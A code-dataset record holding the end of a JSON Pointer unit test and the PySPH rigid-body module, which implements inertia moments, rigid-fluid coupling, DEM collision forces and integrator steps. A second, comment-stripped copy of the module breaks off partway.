Pointer.resolve_in('/5', document=[])
with self.assertRaises(error.IndexOutOfRange):
Pointer.resolve_in('5', document=[])
def test_it_raises_an_error_for_non_numeric_array_index(self):
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('/key', document=[])
with self.assertRaises(error.InvalidArrayIndex):
Pointer.resolve_in('key', document=[])
def test_it_raises_an_error_if_key_not_in_document(self):
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('/key', document={})
with self.assertRaises(error.MemberNotDefined):
Pointer.resolve_in('key', document={})
def test_it_recognizes_tilde_escapes(self):
doc = {
'a~b': 1,
'ab~': 2,
'~ab': 3,
'a/b': 4,
'ab/': 5,
'/ab': 6,
'~/~': 7,
'/~/': 8,
'~0': 9,
'~1': 10,
}
self.check_pointer_equal(doc, '/a~0b', 1)
self.check_pointer_equal(doc, '/ab~0', 2)
self.check_pointer_equal(doc, '/~0ab', 3)
self.check_pointer_equal(doc, '/a~1b', 4)
self.check_pointer_equal(doc, '/ab~1', 5)
self.check_pointer_equal(doc, '/~1ab', 6)
self.check_pointer_equal(doc, '/~0~1~0', 7)
self.check_pointer_equal(doc, '/~1~0~1', 8)
self.check_pointer_equal(doc, '/~00', 9)
self.check_pointer_equal(doc, '/~01', 10)
def test_it_raises_an_error_on_unrecognized_escape_sequences(self):
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('/~2', document={})
with self.assertRaises(error.UnrecognizedEscapeSequence):
Pointer.resolve_in('~2', document={})
def test_it_raises_an_error_on_unescaped_tilde(self):
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('/~', document={})
with self.assertRaises(error.UnescapedTilde):
Pointer.resolve_in('~', document={})
def test_it_raises_an_error_if_unable_to_resolve_token(self):
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('/key', document=object())
with self.assertRaises(error.UnreferenceableValue):
Pointer.resolve_in('key', document=object())
def test_it_offers_support_for_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
value = LazyValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
def test_it_offers_support_for_recursive_lazy_loaded_values(self):
class LazyValue:
def __lazy_eval__(self):
return {'a': 1, 'b': 2, 'c': 3}
class EvenLazierValue:
def __lazy_eval__(self):
return LazyValue()
value = EvenLazierValue()
self.assertEqual(Pointer.resolve_in('/a', value), 1)
self.assertEqual(Pointer.resolve_in('/b', value), 2)
self.assertEqual(Pointer.resolve_in('/c', value), 3)
| true | true |
f72ee435673a5217151a45861e9d332977bb5797 | 26,728 | py | Python | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | 1 | 2019-03-11T12:42:56.000Z | 2019-03-11T12:42:56.000Z | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | 1 | 2018-11-17T15:39:11.000Z | 2018-11-17T15:39:11.000Z | pysph/sph/rigid_body.py | rahulgovind/pysph | 3d493e6f2c5284ea9c0f0d008e4eb9a0870da0d9 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Rigid body related equations.
"""
from pysph.base.reduce_array import parallel_reduce_array
from pysph.sph.equation import Equation
from pysph.sph.integrator_step import IntegratorStep
import numpy as np
import numpy
from math import sqrt
def skew(vec):
import sympy as S
x, y, z = vec[0], vec[1], vec[2]
return S.Matrix([[0, -z, y], [z, 0, -x], [-y, x, 0]])
def get_alpha_dot():
"""Use sympy to perform most of the math and use the resulting formulae
to calculate:
inv(I) (\tau - w x (I w))
"""
import sympy as S
ixx, iyy, izz, ixy, ixz, iyz = S.symbols("ixx, iyy, izz, ixy, ixz, iyz")
tx, ty, tz = S.symbols("tx, ty, tz")
wx, wy, wz = S.symbols('wx, wy, wz')
tau = S.Matrix([tx, ty, tz])
I = S.Matrix([[ixx, ixy, ixz], [ixy, iyy, iyz], [ixz, iyz, izz]])
w = S.Matrix([wx, wy, wz])
Iinv = I.inv()
Iinv.simplify()
# inv(I) (\tau - w x (Iw))
res = Iinv*(tau - w.cross(I*w))
res.simplify()
# Now do some awesome sympy magic.
syms, result = S.cse(res, symbols=S.numbered_symbols('tmp'))
for lhs, rhs in syms:
print("%s = %s" % (lhs, rhs))
for i in range(3):
print("omega_dot[%d] =" % i, result[0][i])
def get_torque():
"""Use sympy to perform some simple math.
R x F
C_m x F
w x r
"""
import sympy as S
x, y, z, fx, fy, fz = S.symbols("x, y, z, fx, fy, fz")
R = S.Matrix([x, y, z])
F = S.Matrix([fx, fy, fz])
print("Torque:", R.cross(F))
cx, cy, cz = S.symbols('cx, cy, cz')
d = S.Matrix([cx, cy, cz])
print("c_m x f = ", d.cross(F))
wx, wy, wz = S.symbols('wx, wy, wz')
rx, ry, rz = S.symbols('rx, ry, rz')
w = S.Matrix([wx, wy, wz])
r = S.Matrix([rx, ry, rz])
print("w x r = %s" % w.cross(r))
# This is defined to silence editor warnings for the use of declare.
def declare(*args): pass
class RigidBodyMoments(Equation):
def reduce(self, dst, t, dt):
# FIXME: this will be slow in opencl
nbody = declare('int')
i = declare('int')
base_mi = declare('int')
base = declare('int')
nbody = dst.num_body[0]
if dst.gpu:
dst.gpu.pull('omega', 'x', 'y', 'z', 'fx', 'fy', 'fz')
d_mi = declare('object')
m = declare('object')
x = declare('object')
y = declare('object')
z = declare('object')
fx = declare('object')
fy = declare('object')
fz = declare('object')
d_mi = dst.mi
cond = declare('object')
for i in range(nbody):
cond = dst.body_id == i
base = i*16
m = dst.m[cond]
x = dst.x[cond]
y = dst.y[cond]
z = dst.z[cond]
# Find the total_mass, center of mass and second moments.
d_mi[base + 0] = numpy.sum(m)
d_mi[base + 1] = numpy.sum(m*x)
d_mi[base + 2] = numpy.sum(m*y)
d_mi[base + 3] = numpy.sum(m*z)
# Only do the lower triangle of values moments of inertia.
d_mi[base + 4] = numpy.sum(m*(y*y + z*z))
d_mi[base + 5] = numpy.sum(m*(x*x + z*z))
d_mi[base + 6] = numpy.sum(m*(x*x + y*y))
d_mi[base + 7] = -numpy.sum(m*x*y)
d_mi[base + 8] = -numpy.sum(m*x*z)
d_mi[base + 9] = -numpy.sum(m*y*z)
# the total force and torque
fx = dst.fx[cond]
fy = dst.fy[cond]
fz = dst.fz[cond]
d_mi[base + 10] = numpy.sum(fx)
d_mi[base + 11] = numpy.sum(fy)
d_mi[base + 12] = numpy.sum(fz)
# Calculate the torque and reduce it.
d_mi[base + 13] = numpy.sum(y*fz - z*fy)
d_mi[base + 14] = numpy.sum(z*fx - x*fz)
d_mi[base + 15] = numpy.sum(x*fy - y*fx)
# Reduce the temporary mi values in parallel across processors.
d_mi[:] = parallel_reduce_array(dst.mi)
# Set the reduced values.
for i in range(nbody):
base_mi = i*16
base = i*3
m = d_mi[base_mi + 0]
dst.total_mass[i] = m
cx = d_mi[base_mi + 1]/m
cy = d_mi[base_mi + 2]/m
cz = d_mi[base_mi + 3]/m
dst.cm[base + 0] = cx
dst.cm[base + 1] = cy
dst.cm[base + 2] = cz
# The actual moment of inertia about center of mass from parallel
# axes theorem.
ixx = d_mi[base_mi + 4] - (cy*cy + cz*cz)*m
iyy = d_mi[base_mi + 5] - (cx*cx + cz*cz)*m
izz = d_mi[base_mi + 6] - (cx*cx + cy*cy)*m
ixy = d_mi[base_mi + 7] + cx*cy*m
ixz = d_mi[base_mi + 8] + cx*cz*m
iyz = d_mi[base_mi + 9] + cy*cz*m
d_mi[base_mi + 0] = ixx
d_mi[base_mi + 1] = ixy
d_mi[base_mi + 2] = ixz
d_mi[base_mi + 3] = ixy
d_mi[base_mi + 4] = iyy
d_mi[base_mi + 5] = iyz
d_mi[base_mi + 6] = ixz
d_mi[base_mi + 7] = iyz
d_mi[base_mi + 8] = izz
fx = d_mi[base_mi + 10]
fy = d_mi[base_mi + 11]
fz = d_mi[base_mi + 12]
dst.force[base + 0] = fx
dst.force[base + 1] = fy
dst.force[base + 2] = fz
# Acceleration of CM.
dst.ac[base + 0] = fx/m
dst.ac[base + 1] = fy/m
dst.ac[base + 2] = fz/m
# Find torque about the Center of Mass and not origin.
tx = d_mi[base_mi + 13]
ty = d_mi[base_mi + 14]
tz = d_mi[base_mi + 15]
tx -= cy*fz - cz*fy
ty -= -cx*fz + cz*fx
tz -= cx*fy - cy*fx
dst.torque[base + 0] = tx
dst.torque[base + 1] = ty
dst.torque[base + 2] = tz
wx = dst.omega[base + 0]
wy = dst.omega[base + 1]
wz = dst.omega[base + 2]
# Find omega_dot from: omega_dot = inv(I) (\tau - w x (Iw))
# This was done using the sympy code above.
tmp0 = iyz**2
tmp1 = ixy**2
tmp2 = ixz**2
tmp3 = ixx*iyy
tmp4 = ixy*ixz
tmp5 = 1./(ixx*tmp0 + iyy*tmp2 - 2*iyz*tmp4 + izz*tmp1 - izz*tmp3)
tmp6 = ixy*izz - ixz*iyz
tmp7 = ixz*wx + iyz*wy + izz*wz
tmp8 = ixx*wx + ixy*wy + ixz*wz
tmp9 = tmp7*wx - tmp8*wz + ty
tmp10 = ixy*iyz - ixz*iyy
tmp11 = ixy*wx + iyy*wy + iyz*wz
tmp12 = -tmp11*wx + tmp8*wy + tz
tmp13 = tmp11*wz - tmp7*wy + tx
tmp14 = ixx*iyz - tmp4
dst.omega_dot[base + 0] = tmp5*(-tmp10*tmp12 -
tmp13*(iyy*izz - tmp0) + tmp6*tmp9)
dst.omega_dot[base + 1] = tmp5*(tmp12*tmp14 +
tmp13*tmp6 - tmp9*(ixx*izz - tmp2))
dst.omega_dot[base + 2] = tmp5*(-tmp10*tmp13 -
tmp12*(-tmp1 + tmp3) + tmp14*tmp9)
if dst.gpu:
dst.gpu.push(
'total_mass', 'mi', 'cm', 'force', 'ac', 'torque',
'omega_dot'
)
class RigidBodyMotion(Equation):
def initialize(self, d_idx, d_x, d_y, d_z, d_u, d_v, d_w,
d_cm, d_vc, d_ac, d_omega, d_body_id):
base = declare('int')
base = d_body_id[d_idx]*3
wx = d_omega[base + 0]
wy = d_omega[base + 1]
wz = d_omega[base + 2]
rx = d_x[d_idx] - d_cm[base + 0]
ry = d_y[d_idx] - d_cm[base + 1]
rz = d_z[d_idx] - d_cm[base + 2]
d_u[d_idx] = d_vc[base + 0] + wy*rz - wz*ry
d_v[d_idx] = d_vc[base + 1] + wz*rx - wx*rz
d_w[d_idx] = d_vc[base + 2] + wx*ry - wy*rx
class BodyForce(Equation):
def __init__(self, dest, sources, gx=0.0, gy=0.0, gz=0.0):
self.gx = gx
self.gy = gy
self.gz = gz
super(BodyForce, self).__init__(dest, sources)
def initialize(self, d_idx, d_m, d_fx, d_fy, d_fz, d_num_body, d_mi):
d_fx[d_idx] = d_m[d_idx]*self.gx
d_fy[d_idx] = d_m[d_idx]*self.gy
d_fz[d_idx] = d_m[d_idx]*self.gz
class SummationDensityBoundary(Equation):
r"""Equation to find the density of the
fluid particle due to any boundary or a rigid body
:math:`\rho_a = \sum_b {\rho}_fluid V_b W_{ab}`
"""
def __init__(self, dest, sources, fluid_rho=1000.0):
self.fluid_rho = fluid_rho
super(SummationDensityBoundary, self).__init__(dest, sources)
def loop(self, d_idx, d_rho, s_idx, s_m, s_V, WIJ):
d_rho[d_idx] += self.fluid_rho * s_V[s_idx] * WIJ
class NumberDensity(Equation):
def initialize(self, d_idx, d_V):
d_V[d_idx] = 0.0
def loop(self, d_idx, d_V, WIJ):
d_V[d_idx] += WIJ
class SummationDensityRigidBody(Equation):
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(SummationDensityRigidBody, self).__init__(dest, sources)
def initialize(self, d_idx, d_rho):
d_rho[d_idx] = 0.0
def loop(self, d_idx, d_rho, s_idx, s_V, WIJ):
d_rho[d_idx] += self.rho0/s_V[s_idx]*WIJ
class ViscosityRigidBody(Equation):
"""The viscous acceleration on the fluid/solid due to a boundary.
Implemented from Akinci et al. http://dx.doi.org/10.1145/2185520.2185558
Use this with the fluid as a destination and body as source.
"""
def __init__(self, dest, sources, rho0, nu):
self.nu = nu
self.rho0 = rho0
super(ViscosityRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_au, d_av, d_aw, d_rho,
s_idx, s_V, s_fx, s_fy, s_fz,
EPS, VIJ, XIJ, R2IJ, DWIJ):
phi_b = self.rho0/(s_V[s_idx]*d_rho[d_idx])
vijdotxij = min(VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2], 0.0)
fac = self.nu*phi_b*vijdotxij/(R2IJ + EPS)
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class PressureRigidBody(Equation):
"""The pressure acceleration on the fluid/solid due to a boundary.
Implemented from Akinci et al. http://dx.doi.org/10.1145/2185520.2185558
Use this with the fluid as a destination and body as source.
"""
def __init__(self, dest, sources, rho0):
self.rho0 = rho0
super(PressureRigidBody, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ):
rho1 = 1.0/d_rho[d_idx]
fac = -d_p[d_idx]*rho1*rho1*self.rho0/s_V[s_idx]
ax = fac*DWIJ[0]
ay = fac*DWIJ[1]
az = fac*DWIJ[2]
d_au[d_idx] += ax
d_av[d_idx] += ay
d_aw[d_idx] += az
s_fx[s_idx] += -d_m[d_idx]*ax
s_fy[s_idx] += -d_m[d_idx]*ay
s_fz[s_idx] += -d_m[d_idx]*az
class AkinciRigidFluidCoupling(Equation):
"""Force between a solid sphere and a SPH fluid particle. This is
implemented using Akinci's[1] force and additional force from solid
bodies pressure which is implemented by Liu[2]
[1]'Versatile Rigid-Fluid Coupling for Incompressible SPH'
URL: https://graphics.ethz.ch/~sobarbar/papers/Sol12/Sol12.pdf
[2]A 3D Simulation of a Moving Solid in Viscous Free-Surface Flows by
Coupling SPH and DEM
https://doi.org/10.1155/2017/3174904
Note: Here forces for both the phases are added at once.
Please make sure that this force is applied only once
for both the particle properties.
"""
def __init__(self, dest, sources, fluid_rho=1000):
super(AkinciRigidFluidCoupling, self).__init__(dest, sources)
self.fluid_rho = fluid_rho
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
psi = s_V[s_idx] * self.fluid_rho
_t1 = 2 * d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -psi * _t1 * DWIJ[0]
d_av[d_idx] += -psi * _t1 * DWIJ[1]
d_aw[d_idx] += -psi * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * psi * _t1 * DWIJ[2]
class LiuFluidForce(Equation):
"""Force between a solid sphere and a SPH fluid particle. This is
implemented using Akinci's[1] force and additional force from solid
bodies pressure which is implemented by Liu[2]
[1]'Versatile Rigid-Fluid Coupling for Incompressible SPH'
URL: https://graphics.ethz.ch/~sobarbar/papers/Sol12/Sol12.pdf
[2]A 3D Simulation of a Moving Solid in Viscous Free-Surface Flows by
Coupling SPH and DEM
https://doi.org/10.1155/2017/3174904
Note: Here forces for both the phases are added at once.
Please make sure that this force is applied only once
for both the particle properties.
"""
def __init__(self, dest, sources):
super(LiuFluidForce, self).__init__(dest, sources)
def loop(self, d_idx, d_m, d_rho, d_au, d_av, d_aw, d_p,
s_idx, s_V, s_fx, s_fy, s_fz, DWIJ, s_m, s_p, s_rho):
_t1 = s_p[s_idx] / (s_rho[s_idx]**2) + d_p[d_idx] / (d_rho[d_idx]**2)
d_au[d_idx] += -s_m[s_idx] * _t1 * DWIJ[0]
d_av[d_idx] += -s_m[s_idx] * _t1 * DWIJ[1]
d_aw[d_idx] += -s_m[s_idx] * _t1 * DWIJ[2]
s_fx[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[0]
s_fy[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[1]
s_fz[s_idx] += d_m[d_idx] * s_m[s_idx] * _t1 * DWIJ[2]
class RigidBodyForceGPUGems(Equation):
"""This is inspired from
http://http.developer.nvidia.com/GPUGems3/gpugems3_ch29.html
and
BK Mishra's article on DEM
http://dx.doi.org/10.1016/S0301-7516(03)00032-2
A review of computer simulation of tumbling mills by the discrete element
method: Part I - contact mechanics
"""
def __init__(self, dest, sources, k=1.0, d=1.0, eta=1.0, kt=1.0):
"""Note that d is a factor multiplied with the "h" of the particle.
"""
self.k = k
self.d = d
self.eta = eta
self.kt = kt
super(RigidBodyForceGPUGems, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, XIJ,
RIJ, R2IJ, VIJ):
vijdotrij = VIJ[0]*XIJ[0] + VIJ[1]*XIJ[1] + VIJ[2]*XIJ[2]
if RIJ > 1e-9:
vijdotrij_r2ij = vijdotrij/R2IJ
nij_x = XIJ[0]/RIJ
nij_y = XIJ[1]/RIJ
nij_z = XIJ[2]/RIJ
else:
vijdotrij_r2ij = 0.0
nij_x = 0.0
nij_y = 0.0
nij_z = 0.0
vijt_x = VIJ[0] - vijdotrij_r2ij*XIJ[0]
vijt_y = VIJ[1] - vijdotrij_r2ij*XIJ[1]
vijt_z = VIJ[2] - vijdotrij_r2ij*XIJ[2]
d = self.d*d_h[d_idx]
fac = self.k*d_total_mass[0]/d*max(d - RIJ, 0.0)
d_fx[d_idx] += fac*nij_x - self.eta*VIJ[0] - self.kt*vijt_x
d_fy[d_idx] += fac*nij_y - self.eta*VIJ[1] - self.kt*vijt_y
d_fz[d_idx] += fac*nij_z - self.eta*VIJ[2] - self.kt*vijt_z
class RigidBodyCollision(Equation):
"""Force between two spheres is implemented using DEM contact force law.
Refer https://doi.org/10.1016/j.powtec.2011.09.019 for more
information.
Open-source MFIX-DEM software for gas–solids flows:
Part I—Verification studies .
"""
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
"""Initialise the required coefficients for force calculation.
Keyword arguments:
kn -- Normal spring stiffness (default 1e3)
mu -- friction coefficient (default 0.5)
en -- coefficient of restitution (0.8)
Given these coefficients, tangential spring stiffness, normal and
tangential damping coefficient are calculated by default.
"""
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, s_rad_s, XIJ, RIJ,
R2IJ, VIJ):
overlap = 0
if RIJ > 1e-9:
overlap = d_rad_s[d_idx] + s_rad_s[s_idx] - RIJ
if overlap > 0:
# normal vector passing from particle i to j
nij_x = -XIJ[0] / RIJ
nij_y = -XIJ[1] / RIJ
nij_z = -XIJ[2] / RIJ
# overlap speed: a scalar
vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
# normal velocity
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
# normal force with conservative and dissipation part
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
# ----------------------Tangential force---------------------- #
# tangential velocity
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
dtvx = d_tang_velocity_x[d_idx]
dtvy = d_tang_velocity_y[d_idx]
dtvz = d_tang_velocity_z[d_idx]
_tang = sqrt(dtvx*dtvx + dtvy*dtvy + dtvz*dtvz)
# tangential unit vector
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
# damping force or dissipation
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
# tangential spring force
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
# coulomb law
ftij = sqrt((ft_x**2) + (ft_y**2) + (ft_z**2))
fnij = sqrt((fn_x**2) + (fn_y**2) + (fn_z**2))
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class RigidBodyWallCollision(Equation):
"""Force between sphere and a wall is implemented using
DEM contact force law.
Refer https://doi.org/10.1016/j.powtec.2011.09.019 for more
information.
Open-source MFIX-DEM software for gas–solids flows:
Part I—Verification studies .
"""
def __init__(self, dest, sources, kn=1e3, mu=0.5, en=0.8):
"""Initialise the required coefficients for force calculation.
Keyword arguments:
kn -- Normal spring stiffness (default 1e3)
mu -- friction coefficient (default 0.5)
en -- coefficient of restitution (0.8)
Given these coefficients, tangential spring stiffness, normal and
tangential damping coefficient are calculated by default.
"""
self.kn = kn
self.kt = 2. / 7. * kn
m_eff = np.pi * 0.5**2 * 1e-6 * 2120
self.gamma_n = -(2 * np.sqrt(kn * m_eff) * np.log(en)) / (
np.sqrt(np.pi**2 + np.log(en)**2))
print(self.gamma_n)
self.gamma_t = 0.5 * self.gamma_n
self.mu = mu
super(RigidBodyWallCollision, self).__init__(dest, sources)
def loop(self, d_idx, d_fx, d_fy, d_fz, d_h, d_total_mass, d_rad_s,
d_tang_disp_x, d_tang_disp_y, d_tang_disp_z, d_tang_velocity_x,
d_tang_velocity_y, d_tang_velocity_z, s_idx, XIJ, RIJ,
R2IJ, VIJ, s_nx, s_ny, s_nz):
# check overlap amount
overlap = d_rad_s[d_idx] - (XIJ[0] * s_nx[s_idx] + XIJ[1] *
s_ny[s_idx] + XIJ[2] * s_nz[s_idx])
if overlap > 0:
# basic variables: normal vector
nij_x = -s_nx[s_idx]
nij_y = -s_ny[s_idx]
nij_z = -s_nz[s_idx]
# overlap speed: a scalar
vijdotnij = VIJ[0] * nij_x + VIJ[1] * nij_y + VIJ[2] * nij_z
# normal velocity
vijn_x = vijdotnij * nij_x
vijn_y = vijdotnij * nij_y
vijn_z = vijdotnij * nij_z
# normal force with conservative and dissipation part
fn_x = -self.kn * overlap * nij_x - self.gamma_n * vijn_x
fn_y = -self.kn * overlap * nij_y - self.gamma_n * vijn_y
fn_z = -self.kn * overlap * nij_z - self.gamma_n * vijn_z
# ----------------------Tangential force---------------------- #
# tangential velocity
d_tang_velocity_x[d_idx] = VIJ[0] - vijn_x
d_tang_velocity_y[d_idx] = VIJ[1] - vijn_y
d_tang_velocity_z[d_idx] = VIJ[2] - vijn_z
_tang = (
(d_tang_velocity_x[d_idx]**2) + (d_tang_velocity_y[d_idx]**2) +
(d_tang_velocity_z[d_idx]**2))**(1. / 2.)
# tangential unit vector
tij_x = 0
tij_y = 0
tij_z = 0
if _tang > 0:
tij_x = d_tang_velocity_x[d_idx] / _tang
tij_y = d_tang_velocity_y[d_idx] / _tang
tij_z = d_tang_velocity_z[d_idx] / _tang
# damping force or dissipation
ft_x_d = -self.gamma_t * d_tang_velocity_x[d_idx]
ft_y_d = -self.gamma_t * d_tang_velocity_y[d_idx]
ft_z_d = -self.gamma_t * d_tang_velocity_z[d_idx]
# tangential spring force
ft_x_s = -self.kt * d_tang_disp_x[d_idx]
ft_y_s = -self.kt * d_tang_disp_y[d_idx]
ft_z_s = -self.kt * d_tang_disp_z[d_idx]
ft_x = ft_x_d + ft_x_s
ft_y = ft_y_d + ft_y_s
ft_z = ft_z_d + ft_z_s
# coulomb law
ftij = ((ft_x**2) + (ft_y**2) + (ft_z**2))**(1. / 2.)
fnij = ((fn_x**2) + (fn_y**2) + (fn_z**2))**(1. / 2.)
_fnij = self.mu * fnij
if _fnij < ftij:
ft_x = -_fnij * tij_x
ft_y = -_fnij * tij_y
ft_z = -_fnij * tij_z
d_fx[d_idx] += fn_x + ft_x
d_fy[d_idx] += fn_y + ft_y
d_fz[d_idx] += fn_z + ft_z
# print(d_fz[d_idx])
else:
d_tang_velocity_x[d_idx] = 0
d_tang_velocity_y[d_idx] = 0
d_tang_velocity_z[d_idx] = 0
d_tang_disp_x[d_idx] = 0
d_tang_disp_y[d_idx] = 0
d_tang_disp_z[d_idx] = 0
class EulerStepRigidBody(IntegratorStep):
"""Fast but inaccurate integrator. Use this for testing"""
def initialize(self):
pass
def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z,
d_omega, d_omega_dot, d_vc, d_ac, d_num_body,
dt=0.0):
_i = declare('int')
_j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for _j in range(3):
d_vc[base + _j] += d_ac[base + _j]*dt
d_omega[base + _j] += d_omega_dot[base + _j]*dt
d_x[d_idx] += dt*d_u[d_idx]
d_y[d_idx] += dt*d_v[d_idx]
d_z[d_idx] += dt*d_w[d_idx]
class RK2StepRigidBody(IntegratorStep):
def initialize(self, d_idx, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega0, d_vc, d_vc0, d_num_body):
_i = declare('int')
_j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for _j in range(3):
d_vc0[base + _j] = d_vc[base + _j]
d_omega0[base + _j] = d_omega[base + _j]
d_x0[d_idx] = d_x[d_idx]
d_y0[d_idx] = d_y[d_idx]
d_z0[d_idx] = d_z[d_idx]
def stage1(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
dt=0.0):
dtb2 = 0.5*dt
_i = declare('int')
j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for j in range(3):
d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dtb2
d_omega[base + j] = (d_omega0[base + j] +
d_omega_dot[base + j]*dtb2)
d_x[d_idx] = d_x0[d_idx] + dtb2*d_u[d_idx]
d_y[d_idx] = d_y0[d_idx] + dtb2*d_v[d_idx]
d_z[d_idx] = d_z0[d_idx] + dtb2*d_w[d_idx]
def stage2(self, d_idx, d_u, d_v, d_w, d_x, d_y, d_z, d_x0, d_y0, d_z0,
d_omega, d_omega_dot, d_vc, d_ac, d_omega0, d_vc0, d_num_body,
dt=0.0):
_i = declare('int')
j = declare('int')
base = declare('int')
if d_idx == 0:
for _i in range(d_num_body[0]):
base = 3*_i
for j in range(3):
d_vc[base + j] = d_vc0[base + j] + d_ac[base + j]*dt
d_omega[base + j] = (d_omega0[base + j] +
d_omega_dot[base + j]*dt)
d_x[d_idx] = d_x0[d_idx] + dt*d_u[d_idx]
d_y[d_idx] = d_y0[d_idx] + dt*d_v[d_idx]
d_z[d_idx] = d_z0[d_idx] + dt*d_w[d_idx]
| 34.666667 | 79 | 0.531877 |
from pysph.base.reduce_array import parallel_reduce_array
from pysph.sph.equation import Equation
from pysph.sph.integrator_step import IntegratorStep
import numpy as np
import numpy
from math import sqrt
def skew(vec):
import sympy as S
x, y, z = vec[0], vec[1], vec[2]
return S.Matrix([[0, -z, y], [z, 0, -x], [-y, x, 0]])
def get_alpha_dot():
import sympy as S
ixx, iyy, izz, ixy, ixz, iyz = S.symbols("ixx, iyy, izz, ixy, ixz, iyz")
tx, ty, tz = S.symbols("tx, ty, tz")
wx, wy, wz = S.symbols('wx, wy, wz')
tau = S.Matrix([tx, ty, tz])
I = S.Matrix([[ixx, ixy, ixz], [ixy, iyy, iyz], [ixz, iyz, izz]])
w = S.Matrix([wx, wy, wz])
Iinv = I.inv()
Iinv.simplify()
res = Iinv*(tau - w.cross(I*w))
res.simplify()
syms, result = S.cse(res, symbols=S.numbered_symbols('tmp'))
for lhs, rhs in syms:
print("%s = %s" % (lhs, rhs))
for i in range(3):
print("omega_dot[%d] =" % i, result[0][i])
def get_torque():
import sympy as S
x, y, z, fx, fy, fz = S.symbols("x, y, z, fx, fy, fz")
R = S.Matrix([x, y, z])
F = S.Matrix([fx, fy, fz])
print("Torque:", R.cross(F))
cx, cy, cz = S.symbols('cx, cy, cz')
d = S.Matrix([cx, cy, cz])
